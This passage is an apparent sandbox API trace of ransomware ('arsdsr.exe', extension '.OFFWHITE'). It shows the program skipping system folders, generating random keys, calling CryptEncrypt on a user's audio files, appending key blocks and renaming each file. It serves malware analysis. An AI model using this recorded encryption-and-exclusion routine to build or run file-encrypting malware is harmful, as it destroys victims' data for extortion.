ftCreationTime.dwLowDateTime=0xe9e67660, ftCreationTime.dwHighDateTime=0x1d5df6a, ftLastAccessTime.dwLowDateTime=0xbb6ac20, ftLastAccessTime.dwHighDateTime=0x1d5e654, ftLastWriteTime.dwLowDateTime=0xbb6ac20, ftLastWriteTime.dwHighDateTime=0x1d5e654, nFileSizeHigh=0x0, nFileSizeLow=0xc3d2, dwReserved0=0x295d1bc, dwReserved1=0xbc72d76c, cFileName="Wz2YhZtiwmeI8.mp3", cAlternateFileName="WZ2YHZ~1.MP3")) returned 1 [0135.050] lstrcmpiW (lpString1="Wz2YhZtiwmeI8.mp3", lpString2=".") returned 1 [0135.050] lstrcmpiW (lpString1="Wz2YhZtiwmeI8.mp3", lpString2="..") returned 1 [0135.050] lstrcmpiW (lpString1="Wz2YhZtiwmeI8.mp3", lpString2="...") returned 1 [0135.050] lstrcmpiW (lpString1="Wz2YhZtiwmeI8.mp3", lpString2="windows") returned 1 [0135.050] lstrcmpiW (lpString1="Wz2YhZtiwmeI8.mp3", lpString2="$recycle.bin") returned 1 [0135.050] lstrcmpiW (lpString1="Wz2YhZtiwmeI8.mp3", lpString2="rsa") returned 1 [0135.050] lstrcmpiW (lpString1="Wz2YhZtiwmeI8.mp3", lpString2="ntuser.dat") returned 1 [0135.050] lstrcmpiW (lpString1="Wz2YhZtiwmeI8.mp3", lpString2="programdata") returned 1 [0135.050] lstrcmpiW (lpString1="Wz2YhZtiwmeI8.mp3", lpString2="appdata") returned 1 [0135.050] lstrcmpiW (lpString1="Wz2YhZtiwmeI8.mp3", lpString2="program files") returned 1 [0135.050] lstrcmpiW (lpString1="Wz2YhZtiwmeI8.mp3", lpString2="program files (x86)") returned 1 [0135.050] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\" [0135.050] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\", lpString2="Wz2YhZtiwmeI8.mp3" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\Wz2YhZtiwmeI8.mp3") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\nJ5q3Y TzGq\\Wz2YhZtiwmeI8.mp3" [0135.050] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.050] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.051] PathFindExtensionW (pszPath="Wz2YhZtiwmeI8.mp3") returned=".mp3" [0135.051] lstrcmpiW (lpString1=".mp3", lpString2=".exe") returned 1 [0135.051] lstrcmpiW (lpString1=".mp3", lpString2=".log") returned 1 [0135.051] lstrcmpiW (lpString1=".mp3", lpString2=".cab") returned 1 [0135.051] lstrcmpiW (lpString1=".mp3", lpString2=".cmd") returned 1 [0135.051] lstrcmpiW (lpString1=".mp3", lpString2=".com") returned 1 [0135.051] lstrcmpiW (lpString1=".mp3", lpString2=".cpl") returned 1 [0135.051] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0135.051] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0135.051] lstrcmpiW (lpString1=".mp3", lpString2=".url") returned -1 [0135.051] lstrcmpiW (lpString1=".mp3", lpString2=".ttf") returned -1 [0135.051] lstrcmpiW (lpString1=".mp3", lpString2=".mp3") returned 0 [0135.051] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9e67660, ftCreationTime.dwHighDateTime=0x1d5df6a, ftLastAccessTime.dwLowDateTime=0xbb6ac20, ftLastAccessTime.dwHighDateTime=0x1d5e654, ftLastWriteTime.dwLowDateTime=0xbb6ac20, ftLastWriteTime.dwHighDateTime=0x1d5e654, nFileSizeHigh=0x0, nFileSizeLow=0xc3d2, dwReserved0=0x295d1bc, dwReserved1=0xbc72d76c, cFileName="Wz2YhZtiwmeI8.mp3", cAlternateFileName="WZ2YHZ~1.MP3")) returned 0 [0135.051] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0135.051] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5470ba40, ftCreationTime.dwHighDateTime=0x1d5e38f, ftLastAccessTime.dwLowDateTime=0xb1d94220, ftLastAccessTime.dwHighDateTime=0x1d5e1ea, ftLastWriteTime.dwLowDateTime=0xb1d94220, ftLastWriteTime.dwHighDateTime=0x1d5e1ea, nFileSizeHigh=0x0, nFileSizeLow=0xec49, dwReserved0=0x5c005a, dwReserved1=0x295e370, cFileName="Rf00y5uBh7GsGkEbl2.m4a", cAlternateFileName="RF00Y5~1.M4A")) returned 1 [0135.051] lstrcmpiW (lpString1="Rf00y5uBh7GsGkEbl2.m4a", lpString2=".") returned 1 [0135.051] lstrcmpiW (lpString1="Rf00y5uBh7GsGkEbl2.m4a", lpString2="..") returned 1 [0135.051] lstrcmpiW (lpString1="Rf00y5uBh7GsGkEbl2.m4a", lpString2="...") returned 1 [0135.051] lstrcmpiW (lpString1="Rf00y5uBh7GsGkEbl2.m4a", lpString2="windows") returned -1 [0135.051] lstrcmpiW (lpString1="Rf00y5uBh7GsGkEbl2.m4a", lpString2="$recycle.bin") returned 1 [0135.051] lstrcmpiW (lpString1="Rf00y5uBh7GsGkEbl2.m4a", lpString2="rsa") returned -1 [0135.051] lstrcmpiW (lpString1="Rf00y5uBh7GsGkEbl2.m4a", lpString2="ntuser.dat") returned 1 [0135.051] lstrcmpiW (lpString1="Rf00y5uBh7GsGkEbl2.m4a", lpString2="programdata") returned 1 [0135.051] lstrcmpiW (lpString1="Rf00y5uBh7GsGkEbl2.m4a", lpString2="appdata") returned 1 [0135.052] lstrcmpiW (lpString1="Rf00y5uBh7GsGkEbl2.m4a", lpString2="program files") returned 1 [0135.052] lstrcmpiW (lpString1="Rf00y5uBh7GsGkEbl2.m4a", lpString2="program files (x86)") returned 1 [0135.052] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\" [0135.052] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\", lpString2="Rf00y5uBh7GsGkEbl2.m4a" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\Rf00y5uBh7GsGkEbl2.m4a") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\Rf00y5uBh7GsGkEbl2.m4a" [0135.052] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.052] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.052] PathFindExtensionW (pszPath="Rf00y5uBh7GsGkEbl2.m4a") returned=".m4a" [0135.052] lstrcmpiW (lpString1=".m4a", lpString2=".exe") returned 1 [0135.052] lstrcmpiW (lpString1=".m4a", lpString2=".log") returned 1 [0135.052] lstrcmpiW (lpString1=".m4a", lpString2=".cab") returned 1 [0135.052] lstrcmpiW (lpString1=".m4a", lpString2=".cmd") returned 1 [0135.052] lstrcmpiW (lpString1=".m4a", lpString2=".com") returned 1 [0135.052] lstrcmpiW (lpString1=".m4a", lpString2=".cpl") returned 1 [0135.052] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0135.052] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0135.052] lstrcmpiW (lpString1=".m4a", lpString2=".url") returned -1 [0135.052] lstrcmpiW (lpString1=".m4a", lpString2=".ttf") returned -1 [0135.052] lstrcmpiW (lpString1=".m4a", lpString2=".mp3") returned -1 [0135.052] lstrcmpiW (lpString1=".m4a", lpString2=".pif") returned -1 [0135.052] lstrcmpiW (lpString1=".m4a", lpString2=".mp4") returned -1 [0135.052] lstrcmpiW (lpString1=".m4a", lpString2=".OFFWHITE") returned -1 [0135.052] lstrcmpiW (lpString1=".m4a", lpString2=".msi") returned -1 [0135.052] lstrcmpiW (lpString1="Rf00y5uBh7GsGkEbl2.m4a", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0135.052] GetProcessHeap () returned 0x500000 [0135.053] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5318b0 [0135.053] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\Rf00y5uBh7GsGkEbl2.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\rf00y5ubh7gsgkebl2.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0135.053] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=60489) returned 1 [0135.053] GetProcessHeap () returned 0x500000 [0135.053] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0135.053] GetProcessHeap () returned 0x500000 [0135.053] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0135.053] GetProcessHeap () returned 0x500000 [0135.053] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0135.053] GetProcessHeap () returned 0x500000 [0135.053] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0135.053] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.053] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.053] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0135.053] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.053] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.053] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0135.053] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.053] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.054] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295d610*=0x100) returned 1 [0135.054] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.054] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.054] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295d60c*=0x100) returned 1 [0135.054] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xec49, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.054] SetLastError (dwErrCode=0x0) [0135.054] WriteFile (in: hFile=0x214, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0135.056] GetLastError () returned 0x0 [0135.056] GetLastError () returned 0x0 [0135.056] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xed49, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.056] WriteFile (in: hFile=0x214, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0135.056] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xee49, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.056] WriteFile (in: hFile=0x214, lpBuffer=0x5318b0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x5318b0*, lpNumberOfBytesWritten=0x295d84c*=0x8, lpOverlapped=0x0) returned 1 [0135.056] GetProcessHeap () returned 0x500000 [0135.056] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xec49) returned 0x55b7c0 [0135.056] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.057] ReadFile (in: hFile=0x214, lpBuffer=0x55b7c0, nNumberOfBytesToRead=0xec49, lpNumberOfBytesRead=0x295d840, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesRead=0x295d840*=0xec49, lpOverlapped=0x0) returned 1 [0135.061] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.061] WriteFile (in: hFile=0x214, lpBuffer=0x55b7c0*, nNumberOfBytesToWrite=0xec49, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesWritten=0x295d84c*=0xec49, lpOverlapped=0x0) returned 1 [0135.062] GetProcessHeap () returned 0x500000 [0135.062] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55b7c0 | out: hHeap=0x500000) returned 1 [0135.062] CloseHandle (hObject=0x214) returned 1 [0135.068] GetProcessHeap () returned 0x500000 [0135.069] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0135.069] GetProcessHeap () returned 0x500000 [0135.069] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0135.069] GetProcessHeap () returned 0x500000 [0135.069] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0135.069] GetProcessHeap () returned 0x500000 [0135.069] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0135.069] lstrcpyW (in: lpString1=0x295d638, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\Rf00y5uBh7GsGkEbl2.m4a" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\Rf00y5uBh7GsGkEbl2.m4a") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\Rf00y5uBh7GsGkEbl2.m4a" [0135.069] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\Rf00y5uBh7GsGkEbl2.m4a", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\Rf00y5uBh7GsGkEbl2.m4a.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\Rf00y5uBh7GsGkEbl2.m4a.OFFWHITE" [0135.069] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\Rf00y5uBh7GsGkEbl2.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\rf00y5ubh7gsgkebl2.m4a"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\Rf00y5uBh7GsGkEbl2.m4a.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\rf00y5ubh7gsgkebl2.m4a.offwhite")) returned 1 [0135.070] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fe6c3f0, ftCreationTime.dwHighDateTime=0x1d5dc4b, ftLastAccessTime.dwLowDateTime=0x277e45a0, ftLastAccessTime.dwHighDateTime=0x1d5db49, ftLastWriteTime.dwLowDateTime=0x277e45a0, ftLastWriteTime.dwHighDateTime=0x1d5db49, nFileSizeHigh=0x0, nFileSizeLow=0x6c2e, dwReserved0=0x5c005a, dwReserved1=0x295e370, cFileName="ZMJnq4AyBwW_Ef.wav", cAlternateFileName="ZMJNQ4~1.WAV")) returned 1 [0135.070] lstrcmpiW (lpString1="ZMJnq4AyBwW_Ef.wav", lpString2=".") returned 1 [0135.070] lstrcmpiW (lpString1="ZMJnq4AyBwW_Ef.wav", lpString2="..") returned 1 [0135.070] lstrcmpiW (lpString1="ZMJnq4AyBwW_Ef.wav", lpString2="...") returned 1 [0135.070] lstrcmpiW (lpString1="ZMJnq4AyBwW_Ef.wav", lpString2="windows") returned 1 [0135.070] lstrcmpiW (lpString1="ZMJnq4AyBwW_Ef.wav", lpString2="$recycle.bin") returned 1 [0135.070] lstrcmpiW (lpString1="ZMJnq4AyBwW_Ef.wav", lpString2="rsa") returned 1 [0135.070] lstrcmpiW (lpString1="ZMJnq4AyBwW_Ef.wav", lpString2="ntuser.dat") returned 1 [0135.070] lstrcmpiW (lpString1="ZMJnq4AyBwW_Ef.wav", lpString2="programdata") returned 1 [0135.070] lstrcmpiW (lpString1="ZMJnq4AyBwW_Ef.wav", lpString2="appdata") returned 1 [0135.070] lstrcmpiW (lpString1="ZMJnq4AyBwW_Ef.wav", lpString2="program files") returned 1 [0135.070] lstrcmpiW (lpString1="ZMJnq4AyBwW_Ef.wav", lpString2="program files (x86)") returned 1 [0135.070] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\" [0135.070] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\", lpString2="ZMJnq4AyBwW_Ef.wav" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\ZMJnq4AyBwW_Ef.wav") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\ZMJnq4AyBwW_Ef.wav" [0135.070] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.070] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.070] PathFindExtensionW (pszPath="ZMJnq4AyBwW_Ef.wav") returned=".wav" [0135.070] lstrcmpiW (lpString1=".wav", lpString2=".exe") returned 1 [0135.070] lstrcmpiW (lpString1=".wav", lpString2=".log") returned 1 [0135.070] lstrcmpiW (lpString1=".wav", lpString2=".cab") returned 1 [0135.070] lstrcmpiW (lpString1=".wav", lpString2=".cmd") returned 1 [0135.070] lstrcmpiW (lpString1=".wav", lpString2=".com") returned 1 [0135.070] lstrcmpiW (lpString1=".wav", lpString2=".cpl") returned 1 [0135.070] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0135.070] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0135.071] lstrcmpiW (lpString1=".wav", lpString2=".url") returned 1 [0135.071] lstrcmpiW (lpString1=".wav", lpString2=".ttf") returned 1 [0135.071] lstrcmpiW (lpString1=".wav", lpString2=".mp3") returned 1 [0135.071] lstrcmpiW (lpString1=".wav", lpString2=".pif") returned 1 [0135.071] lstrcmpiW (lpString1=".wav", lpString2=".mp4") returned 1 [0135.071] lstrcmpiW (lpString1=".wav", lpString2=".OFFWHITE") returned 1 [0135.071] lstrcmpiW (lpString1=".wav", lpString2=".msi") returned 1 [0135.071] lstrcmpiW (lpString1="ZMJnq4AyBwW_Ef.wav", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0135.071] GetProcessHeap () returned 0x500000 [0135.071] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5318c0 [0135.071] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\ZMJnq4AyBwW_Ef.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\zmjnq4aybww_ef.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0135.072] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=27694) returned 1 [0135.072] GetProcessHeap () returned 0x500000 [0135.072] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0135.072] GetProcessHeap () returned 0x500000 [0135.072] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0135.072] GetProcessHeap () returned 0x500000 [0135.072] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0135.072] GetProcessHeap () returned 0x500000 [0135.073] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0135.073] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.073] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.073] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0135.073] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.073] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.073] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0135.073] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.073] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.073] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295d610*=0x100) returned 1 [0135.073] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.073] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.073] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295d60c*=0x100) returned 1 [0135.073] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x6c2e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.074] SetLastError (dwErrCode=0x0) [0135.074] WriteFile (in: hFile=0x214, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0135.075] GetLastError () returned 0x0 [0135.075] GetLastError () returned 0x0 [0135.075] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x6d2e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.076] WriteFile (in: hFile=0x214, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0135.076] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x6e2e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.076] WriteFile (in: hFile=0x214, lpBuffer=0x5318c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x5318c0*, lpNumberOfBytesWritten=0x295d84c*=0x8, lpOverlapped=0x0) returned 1 [0135.076] GetProcessHeap () returned 0x500000 [0135.076] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x6c2e) returned 0x55b7c0 [0135.076] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.076] ReadFile (in: hFile=0x214, lpBuffer=0x55b7c0, nNumberOfBytesToRead=0x6c2e, lpNumberOfBytesRead=0x295d840, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesRead=0x295d840*=0x6c2e, lpOverlapped=0x0) returned 1 [0135.078] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.078] WriteFile (in: hFile=0x214, lpBuffer=0x55b7c0*, nNumberOfBytesToWrite=0x6c2e, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesWritten=0x295d84c*=0x6c2e, lpOverlapped=0x0) returned 1 [0135.079] GetProcessHeap () returned 0x500000 [0135.079] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55b7c0 | out: hHeap=0x500000) returned 1 [0135.079] CloseHandle (hObject=0x214) returned 1 [0135.081] GetProcessHeap () returned 0x500000 [0135.081] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0135.081] GetProcessHeap () returned 0x500000 [0135.081] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0135.081] GetProcessHeap () returned 0x500000 [0135.081] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0135.081] GetProcessHeap () returned 0x500000 [0135.081] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0135.081] lstrcpyW (in: lpString1=0x295d638, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\ZMJnq4AyBwW_Ef.wav" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\ZMJnq4AyBwW_Ef.wav") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\ZMJnq4AyBwW_Ef.wav" [0135.081] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\ZMJnq4AyBwW_Ef.wav", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\ZMJnq4AyBwW_Ef.wav.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\ZMJnq4AyBwW_Ef.wav.OFFWHITE" [0135.081] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\ZMJnq4AyBwW_Ef.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\zmjnq4aybww_ef.wav"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\ZMJnq4AyBwW_Ef.wav.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\zmjnq4aybww_ef.wav.offwhite")) returned 1 [0135.082] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fe6c3f0, ftCreationTime.dwHighDateTime=0x1d5dc4b, 